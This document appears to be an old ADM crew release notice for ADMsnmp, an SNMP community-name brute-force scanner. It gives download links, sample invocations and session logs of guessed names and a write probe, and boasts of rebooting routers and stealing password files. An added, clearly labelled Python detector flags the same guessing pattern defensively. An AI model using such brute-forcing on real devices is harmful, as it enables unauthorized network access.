..oO THE ADM CreW Oo..

presents

[ ADMsnmp v 0.1 ]
* SNMP audit scanner *

ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
http://el8.org/~antilove/ADMsnmp.0.1.tar.gz
ADMsnmp is an snmpd audit scanner.
Do any of you know how weak and funny snmp is?
You can obtain a great deal of useful info like admin names,
you can play with the interface of the router, reboot the machine,
get the password file of the router (Ascend), or execute commands remotely;
anyway, snmp is a BIG hole.
ADMsnmp can brute force the snmp community name (with a wordfile) or
make a wordfile list derived from the hostname.
ADMsnmp reports to you all valid community
names found and informs you if writable access to the MIB has been attained.
ADMsnmp is very easy to use and designed with speed in mind!
Here is an example session:
[root@ADM apps]# a.out 172.21.6.1 -wor snmp.passwd -sleep 1
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
>>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>>
<!ADM!> snmp check on router.dream.on.it <!ADM!>
sys.sysName.0:router.dream.on.it
name = private write access
ADMsnmp informs you if it has write access to the MIB with the community name private.
snmpwalk <ip> <community name> and enjoy ;)

Another example, ADMsnmp localhost -g (with the guessname option):
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=public id = 2 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 3 name = public ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=private id = 5 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 4 name = public ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost95 id = 8 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 6 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>>> send setrequest id = 6 name = private >>>>>>>>
>>>>>>>>>>> get req name=localhost96 id = 11 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 7 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost97 id = 14 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 9 name = localhost95 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost98 id = 17 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 10 name = localhost95 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost99 id = 20 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost0 id = 23 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost1 id = 26 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 12 name = localhost96 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost2 id = 29 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 13 name = localhost96 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost3 id = 32 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 15 name = localhost97 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost4 id = 35 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 16 name = localhost97 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost5 id = 38 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 18 name = localhost98 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost6 id = 41 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 19 name = localhost98 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost7 id = 44 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 21 name = localhost99 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost8 id = 47 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 22 name = localhost99 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost9 id = 50 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 24 name = localhost0 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost10 id = 53 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 25 name = localhost0 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost00 id = 56 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 27 name = localhost1 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost01 id = 59 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 28 name = localhost1 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost02 id = 62 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 30 name = localhost2 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost03 id = 65 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 31 name = localhost2 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost04 id = 68 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 33 name = localhost3 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost05 id = 71 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 34 name = localhost3 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost06 id = 74 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 36 name = localhost4 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost07 id = 77 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 37 name = localhost4 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost08 id = 80 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 39 name = localhost5 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost09 id = 83 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 40 name = localhost5 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=localhost10 id = 86 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 42 name = localhost6 ret =2 <<<<<<<<<<
>>>>>>>>>>> get req name=LOCALHOST95 id = 89 >>>>>>>>>>>
etc..
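Both sessions above leave the same footprint on the wire: one source cycles through many community names in a few seconds, and as soon as the agent answers a get with ret =0 a setrequest with that same name follows. The detector below is an added example written from the defender's side; it is not part of ADMsnmp or the ADM release. It parses a constructed sensor log of SNMP requests (the line format, addresses and thresholds are assumptions made for this example) and raises one finding for the name cycling and one for the write probe.

```python
"""Detector for SNMP community-name guessing and follow-on write probes.

Added example, not part of ADMsnmp or the ADM release. It reads a
constructed sensor log of SNMPv1/v2c requests and flags the pattern the
sessions above produce.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sensor log (not a real capture). The line format is an
# assumption made for this example:
#   <epoch> <src> -> <dst> <pdu> community=<name> err=<status|none>
# err is the error-status of the agent's reply (0 = noError,
# 2 = noSuchName) or "none" when the agent did not answer at all.
SAMPLE_LOG = """\
1700000000.0 10.0.0.99 -> 10.0.0.1 get community=root err=none
1700000000.5 10.0.0.99 -> 10.0.0.1 get community=public err=2
1700000001.0 10.0.0.99 -> 10.0.0.1 get community=private err=0
1700000001.1 10.0.0.99 -> 10.0.0.1 set community=private err=0
1700000001.5 10.0.0.99 -> 10.0.0.1 get community=write err=none
1700000002.0 10.0.0.99 -> 10.0.0.1 get community=admin err=none
1700000030.0 10.0.0.7 -> 10.0.0.1 get community=monitoring err=0
1700000090.0 10.0.0.7 -> 10.0.0.1 get community=monitoring err=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) (?P<src>\S+) -> (?P<dst>\S+) (?P<pdu>\w+) "
    r"community=(?P<community>\S*) err=(?P<err>\S+)$"
)


@dataclass(frozen=True)
class SnmpRequest:
    ts: float
    src: str
    dst: str
    pdu: str                     # get, getnext, set, ...
    community: str
    error_status: Optional[int]  # None when no reply was observed


def parse_line(line: str) -> Optional[SnmpRequest]:
    """Parse one log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    err = m.group("err")
    return SnmpRequest(
        ts=float(m.group("ts")),
        src=m.group("src"),
        dst=m.group("dst"),
        pdu=m.group("pdu").lower(),
        community=m.group("community"),
        error_status=None if err == "none" else int(err),
    )


def parse_log(text: str) -> List[SnmpRequest]:
    return [r for r in map(parse_line, text.splitlines()) if r is not None]


def detect(requests, window: float = 60.0,
           distinct_threshold: int = 5) -> List[Tuple[str, str, str]]:
    """Return (src, kind, detail) findings.

    community_guessing: one source used >= distinct_threshold different
        community names within `window` seconds (reported once per source).
    write_probe: a source that has already used more than one name sends a
        SetRequest with a name the agent previously answered with noError.
    """
    findings = []
    by_src = defaultdict(list)
    for r in sorted(requests, key=lambda x: x.ts):
        by_src[r.src].append(r)

    for src, reqs in by_src.items():
        recent = deque()      # requests inside the sliding window
        tried = set()         # every community name this source has used
        accepted = set()      # names the agent accepted on a read
        guessing_reported = False
        for r in reqs:
            recent.append(r)
            while r.ts - recent[0].ts > window:
                recent.popleft()
            tried.add(r.community)
            in_window = {x.community for x in recent}
            if not guessing_reported and len(in_window) >= distinct_threshold:
                guessing_reported = True
                findings.append((src, "community_guessing",
                                 f"{len(in_window)} distinct community names "
                                 f"within {window:g}s"))
            if r.pdu in ("get", "getnext") and r.error_status == 0:
                accepted.add(r.community)
            if r.pdu == "set" and r.community in accepted and len(tried) > 1:
                outcome = ("accepted" if r.error_status == 0
                           else "rejected or unanswered")
                findings.append((src, "write_probe",
                                 f"set with community '{r.community}' after "
                                 f"{len(tried)} names tried; {outcome}"))
    return findings


if __name__ == "__main__":
    for src, kind, detail in detect(parse_log(SAMPLE_LOG)):
        print(f"{src}: {kind}: {detail}")
```

The write probe is reported even when the set is rejected, because a set attempt from a source that has been cycling names is already the interesting event; the outcome only says whether the agent's MIB was in fact writable with that name. The legitimate poller in the sample (one name, slow cadence) produces no findings, which is the tuning point for `window` and `distinct_threshold` on a real network.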
ADMsnmp is available on
ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
http://el8.org/~antilove/ADMsnmp.0.1.tar.gz

happy snmp walking :)
The ADM Crew
(thx to #as400 who helped me to boot my as400)